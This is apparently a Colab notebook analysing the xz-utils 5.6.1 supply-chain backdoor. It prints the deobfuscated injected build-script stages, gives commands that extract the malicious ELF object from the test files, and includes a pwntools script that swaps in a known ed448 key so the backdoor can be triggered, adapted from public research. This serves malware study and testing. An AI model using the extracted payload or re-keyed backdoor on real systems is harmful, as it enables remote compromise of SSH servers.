<a href="https://colab.research.google.com/gist/0xchrisw/4778343fd79f9887b4d49145f4d79e78/xz-utils-backdoor.ipynb" target="_parent"><img src="https://colab.research.google.com/assets/colab-badge.svg" alt="Open In Colab"/></a>

# `xz-utils` Backdoor Hindsight

## Post Report Reflections, Payload Extraction & Binary Patches


Lets grab the package in question from [Fedora](https://koji.fedoraproject.org/koji/buildinfo?buildID=2417414); since Ubuntu [took it down](https://launchpad.net/ubuntu/+source/xz-utils/+publishinghistory).


In [ ]:
%%bash

wget https://kojipkgs.fedoraproject.org/packages/xz/5.6.1/1.fc41/src/xz-5.6.1-1.fc41.src.rpm

# Install a few tools
apt-get install rpm2cpio cpio

# Extract the contents of the RPM package
rpm2cpio xz-5.6.1-1.fc41.src.rpm | cpio -idmv

# Extract the xz-5.6.1.tar.gz file
mkdir xz_source
tar -xzvf xz-5.6.1.tar.gz -C xz_source


# Stage 1 - Injected Build Script
Using the methods found in `/content/xz_source/xz-5.6.1/m4/build-to-host.m4` lets rebuild the init script and payload. Check out [@thesamesam](https://gist.github.com/thesamesam/223949d5a074ebc3dce9ee78baad9e27) or [@Midar's](https://github.com/Midar/xz-backdoor-documentation/wiki) write ups for more details.


In [ ]:
%%bash

tr "\t \-_" " \t_\-" < /content/xz_source/xz-5.6.1/tests/files/bad-3-corrupt_lzma2.xz | \
  xz -d 2>/dev/null

####Hello####
#�U��$�
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
[ ! $(uname) = "Linux" ] && exit 0
eval `grep ^srcdir= config.status`
if test -f ../../config.status;then
eval `grep ^srcdir= ../../config.status`
srcdir="../../$srcdir"
fi
export i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +20

## Stage 2 - Extraction

For this process we discard 1024 bytes and read in 2048 for a total of 17 times. Afterwards we trunicate the data to `31265` and substitute some characters(`tr "\5-\51\204-\377\52-\115\132-\203\0-\4\116-\131" "\0-\377"`) then pipe that output back into `xz` (`xz -F raw --lzma1 -dc`).

In [ ]:
%%bash

xz -dc /content/xz_source/xz-5.6.1/tests/files/good-large_compressed.lzma | ( \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +2048 && \
    (head -c +1024 >/dev/null) && \
    head -c +939 ) | \
  tail -c +31233 | \
  tr "\114-\321\322-\377\35-\47\14-\34\0-\13\50-\113" "\0-\377" | \
  xz -F raw --lzma1 -dc


P="-fPIC -DPIC -fno-lto -ffunction-sections -fdata-sections"
C="pic_flag=\" $P\""
O="^pic_flag=\" -fPIC -DPIC\"$"
R="is_arch_extension_supported"
x="__get_cpuid("
p="good-large_compressed.lzma"
U="bad-3-corrupt_lzma2.xz"
[ ! $(uname)="Linux" ] && exit 0
eval $zrKcVq
if test -f config.status; then
eval $zrKcSS
eval `grep ^LD=\'\/ config.status`
eval `grep ^CC=\' config.status`
eval `grep ^GCC=\' config.status`
eval `grep ^srcdir=\' config.status`
eval `grep ^build=\'x86_64 config.status`
eval `grep ^enable_shared=\'yes\' config.status`
eval `grep ^enable_static=\' config.status`
eval `grep ^gl_path_map=\' config.status`
vs=`grep -broaF '~!:_ W' $srcdir/tests/files/ 2>/dev/null`
if test "x$vs" != "x" > /dev/null 2>&1;then
f1=`echo $vs | cut -d: -f1`
if test "x$f1" != "x" > /dev/null 2>&1;then
start=`expr $(echo $vs | cut -d: -f2) + 7`
ve=`grep -broaF '|_!{ -' $srcdir/tests/files/ 2>/dev/null`
if test "x$ve" != "x" > /dev/null 2>&1;then
f2=`echo $ve | cut -d: -f1`
if test "x$f2" != "x" > 

## Stage 3 - Extraction

Gynvael has a great explaination of the obfusication going on [here](https://gynvael.coldwind.pl/?lang=en&id=782).

In [ ]:
%%bash

top_srcdir="/content/xz_source/xz-5.6.1/"
p="good-large_compressed.lzma"
N=0
W=88664
i="((head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +2048 && (head -c +1024 >/dev/null) && head -c +939)";

xz -dc $top_srcdir/tests/files/$p | \
eval $i | \
LC_ALL=C sed "s/\(.\)/\1\n/g" | \
LC_ALL=C awk 'BEGIN{FS="\n";RS="\n";ORS="";m=256;for(i=0;i<m;i++){t[sprintf("x%c",i)]=i;c[i]=((i*7)+5)%m;}i=0;j=0;for(l=0;l<8192;l++){i=(i+1)%m;a=c[i];j=(j+a)%m;c[i]=c[j];c[j]=a;}}{v=t["x" (NF<1?RS:$1)];i=(i+1)%m;a=c[i];j=(j+a)%m;b=c[j];c[i]=b;c[j]=a;k=c[(a+b)%m];printf "%c",(v+k)%m}' | \
xz -dc --single-stream | \
((head -c +$N > /dev/null 2>&1) && head -c +$W) > /content/liblzma_la-crc64-fast.o

file /content/liblzma_la-crc64-fast.o


/content/liblzma_la-crc64-fast.o: ELF 64-bit LSB relocatable, x86-64, version 1 (SYSV), not stripped


Upon running the above cell you should now have the ELF payload(`/content/liblzma_la-crc64-fast.o`).

In [ ]:
backdoor_path = "/content/liblzma_la-crc64-fast.o"

with open(backdoor_path, "rb") as file:
  content = file.read(8).decode()
  print(content)

ELF 


## Simple Analysis

In [ ]:
%%bash

pip install lief


In [ ]:
import lief

backdoor_path = "/content/liblzma_la-crc64-fast.o"

binary = lief.parse(backdoor_path)

print(binary)


Header
Magic:                           7f 45 4c 46 
Class:                           CLASS64
Endianness:                      LSB
Version:                         CURRENT
OS/ABI:                          SYSTEMV
ABI Version:                     0
Machine type:                    x86_64
File type:                       RELOCATABLE
Object file version:             CURRENT
Entry Point:                     0x0
Program header offset:           0x0
Section header offset:           73176
Processor Flag:                  0 
Header size:                     64
Size of program header:          0
Number of program header:        0
Size of section header:          64
Number of section headers:       242
Section Name Table idx:          241

Sections
                    NULL           0         0         0         0                                                      
.note.gnu.property  NOTE           0         20        40        1.87164   ALLOC                                        
.text    

## Patching

Adapted from **@amlweem's** [work](https://github.com/amlweems/xzbot). Their repo has a few more tools and insights.

In [ ]:
%%bash

pip install --upgrade git+https://github.com/Gallopsled/pwntools.git@dev


In [ ]:
import sys


from pwnlib.asm import asm
from pwnlib.util.fiddling import unhex


def patch_binary(file_path, platform_arch="amd64"):
  with open(file_path, 'rb') as f:
    lzma = f.read()

  # TODO: Is the key the same in v5.6.0 and v5.6.1?
  # generate_key bytes from backdoored v5.6.0
  func = unhex('f30f1efa4885ff0f848e000000415455'
              '534889f34881eca00000004885f67504'
              '31c0eb6b4c8b4e084d85c974f34889e2'
              '31c0488d6c24304989fcb90c00000048'
              '89d74989e8be30000000f3abb91c0000'
              '004889eff3ab488d4c24204889d7')

  flen = 160

  # replace generate_key with a static key from mem
  p = asm('''
    push rsi
    lea rsi,[rip+72]
    mov rax, [rsi+0x00]
    mov [rdi+0x00], rax
    mov rax, [rsi+0x08]
    mov [rdi+0x08], rax
    mov rax, [rsi+0x10]
    mov [rdi+0x10], rax
    mov rax, [rsi+0x18]
    mov [rdi+0x18], rax
    mov rax, [rsi+0x20]
    mov [rdi+0x20], rax
    mov rax, [rsi+0x28]
    mov [rdi+0x28], rax
    mov rax, [rsi+0x30]
    mov [rdi+0x30], rax
    mov rax, [rsi+0x38]
    mov [rdi+0x38], rax
    mov eax, 1
    pop rsi
    ret
    nop
    nop
    nop
  ''',
  arch=platform_arch)

  # ed448 public key for seed 0
  p += unhex('5b3afe03878a49b28232d4f1a442aebd'
            'e109f807acef7dfd9a7f65b962fe52d6'
            '547312cacecff04337508f9d2529a8f1'
            '669169b21c32c48000')

  # Pad the patch if needed
  p += b'\x00' * (flen - len(p))

  if func not in lzma:
    sys.exit('Could not identify func')

  off = lzma.index(func)

  with open(f"{file_path}.patch", "wb") as f:
    print(f"Patching func at offset: {hex(off)}")
    f.write(lzma[:off]+p+lzma[off+flen:])


backdoor_path = "/content/liblzma_la-crc64-fast.o"

patch_binary(backdoor_path)

Patching func at offset: 0x8210


## Refferences

- [Microsoft Guidance](https://techcommunity.microsoft.com/t5/microsoft-defender-vulnerability/microsoft-faq-and-guidance-for-xz-utils-backdoor/ba-p/4101961)
- https://www.openwall.com/lists/oss-security/2024/03/29/4
- https://www.wiz.io/blog/cve-2024-3094-critical-rce-vulnerability-found-in-xz-utils


### Patching

- https://gist.github.com/smx-smx/a6112d54777845d389bd7126d6e9f504
- https://gist.github.com/q3k/af3d93b6a1f399de28fe194add452d01
